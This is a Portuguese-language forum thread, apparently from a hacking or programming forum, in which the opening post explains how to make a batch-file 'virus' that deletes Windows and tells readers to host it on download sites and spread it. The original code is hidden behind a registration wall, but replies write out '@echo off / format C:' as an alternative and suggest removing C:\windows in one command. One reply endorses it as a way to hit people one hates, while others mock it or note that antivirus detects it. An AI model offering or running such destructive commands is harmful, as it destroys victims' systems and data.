Ir para conteúdo
Faça parte da equipe! (2024) ×

Criar virus que deleta WINDOWS COM O BLOCO DE NOTAS!


marco jose fernandes
 Compartilhar

Posts Recomendados

Olá, primeiramente quero dizer que aqui nesta área é meu primeiro POST! Então não critiquem.

Primeiramente é claro, abra o BLOCO DE NOTAS. Depois de ter aberto o BLOCO DE NOTAS, coloque o seguinte codigo la dentro:

É necessário se cadastrar para acessar o conteúdo.

Não é um codigo HTML só postei em tags HTML pára o codigo ficar mais visivel.

Segundo passo: Va em ARQUIVO>SALVAR COMO. Coloque qualquer nome seguidamente de .bat ( EX: VIRUS.BAT ) E coloque no TIPO como TODOS OS ARQUIVOS. E salve recomendo no DESKTOP.

OBS: Não abra o arquivo de geito nenhum! Se voce abrir seu PC ira APAGAR! TOME CUIDADO.

Hospede o Virus em algum site de DOWLOAD! E saia divulgando o virus...

Link para o comentário
Compartilhar em outros sites

É funcional, mas seria interessante postar explicando cada linha e as variantes dela,

Pode ser intutivo saber que del é de deletar, mas rmdir e cd pode deixar novatos em dúvida.

 

Só explicando:

  • cd serve para mudar o caminho da pasta que irá mexer
  • sobre o rmdir pode ser visto aqui

Link para o comentário
Compartilhar em outros sites

O local disso deveria ser na Outras linguagens

Pois é programação em BATCH.

 

Pessa para algum moderador mover seu tópico.

 

@Conteúdo

Vai depender do cara, tem que ser um super leigo pra cair nisso.

Conteúdo .bat pode ser editado no bloco de notas, é só o cara abrir antes de executar.

Faça o teste de 'vírus' com isso no VirusTotal, e verá que se alguém tiver um simples anti-vírus, acabará com suas chances de fazer essa coisa inutil...

Meus brinquedos em WinAPI:

Calculador

MemoryScanner

Faça parte também da DarkProgramming Team!

Link para o comentário
Compartilhar em outros sites

Quem está começando a programar, deve focar em aplicativos melhores e mais complexos do que trabalhar com Prompt de comando.

Meus brinquedos em WinAPI:

Calculador

MemoryScanner

Faça parte também da DarkProgramming Team!

Link para o comentário
Compartilhar em outros sites

Existe uma programação do windows que pode anular o arquivo quando ele é executado pelo administrador do computador.

Infelizmente eu não me recordo o nome, mas seria útil para que não ha algum deslize de clicar no arquivo sem querer

ou até alguém não saber o que é e clicar.

 

Não tenho como dizer se é funcional pois acho melhor não arriscar, rs.

Obrigado por compartilhar, uma boa para pegar aqueles que você odeia.

 

Abraços.

Link para o comentário
Compartilhar em outros sites

Quem está começando a programar, deve focar em aplicativos melhores e mais complexos do que trabalhar com Prompt de comando.

 

Certo que a sintaxe não é a das melhores, mas é bom para quem esta começando a ter uma noção de como funciona.

Serve, por exemplo, para entender a lógica.

 

E deste quando deve-se focar em aplicativos complexos quando se esta começando!? Começar estudando a source do Cheat Engine seria pura perda de tempo.

Link para o comentário
Compartilhar em outros sites

Re-leia:

deve focar em aplicativos melhores e mais complexos do que trabalhar com Prompt de comando.

 

Ou seja, até um editor de texto no delphi, se torna mais complexo do que um Shutdown no prompt em .bat .

Em fim, o tópico não é lugar para bate papo, encerro meus posts por aqui.

Meus brinquedos em WinAPI:

Calculador

MemoryScanner

Faça parte também da DarkProgramming Team!

Link para o comentário
Compartilhar em outros sites

Em vez de remover cada dir porque não seleciona a pasta c:\windows de uma vez só ?

"Percorri caminhos que apesar de serem caminhos não eram caminhos, ouvi ruídos do obscuro e calmamente reconfortante, de paleios passei a meros trechos de sabedoria e pura eloquência, perdido na sabedoria ainda não tão ampla mas também não mais tão compacta."

Link para o comentário
Compartilhar em outros sites

@echo off

format C:

 

É mais confiável o comando do tópico, por diversos motivos:

  • Em alguns computadores, o disco principal não é o C;
  • ele primeiramente deleta os principais arquivos do Windows, depois os de mais;
  • o seu fica muito a mostra, não que o do tópico seja oculto, mas é melhor

Link para o comentário
Compartilhar em outros sites

  • 2 meses depois...

kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk a não que que isso não acredito que alguém tem coragem de postar uma porcaria dessa... posta uma coisa dessa é mesmo que postar um tutorial de como desligar o PC corretamente pelo menu iniciar kkkkkkkkkkkkkkkkkkkkkkkkkkkkk fizesse algo melhor como fazer um arquivo joinnado com esse "script" em um modo auto executavel usando até mesmo a opção SFX do winrar ja que você não gosta de mto trabalho kk

 

 

@echo off

format C:

 

o windows quase sempre reside na unidade C sendo assim dara erro pq a unidade não pode se auto-formatar '-' agora se você por um format D:\ ou outro e mais o comando que força uma resposta "sim" do sistema (não lembro qual é o comando pois atualmente uso linux) daria certo.

Link para o comentário
Compartilhar em outros sites

  • 2 meses depois...
  • 4 semanas atrás...

cara que ridiculo isso¬¬

 

faz um virus descente pelo menos além de que o cara que crio esse código que não foi vc que eu sei.. era mais burro ainda porque ir para o diretório do windows e apagar um por um? se vc pode ir para ou C:\ ou nem precisa e remove a pasta do windows intera se for caso cm um comando só :pensativo:

python-doc-icon.jpg

wVNulLU.gif

Link para o comentário
Compartilhar em outros sites

  • 1 mês depois...

Caro membro,

 

Evite comentar em tópicos cujo último post tem mais de 15 dias. (sendo 30 Dias na Info Zone).

 

Isso traz tópicos velhos de volta a primeira página, desorganizando a área.

 

Qualquer dúvida sobre as regras gerais do fórum, leia:

 

 

 

Tópico Trancado

Membro - Bronze - Geek - Bronze - Tech - Mod - Coord - Co-Admin - Platinum

Link para o comentário
Compartilhar em outros sites

Este tópico está impedido de receber novos posts.
 Compartilhar

  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.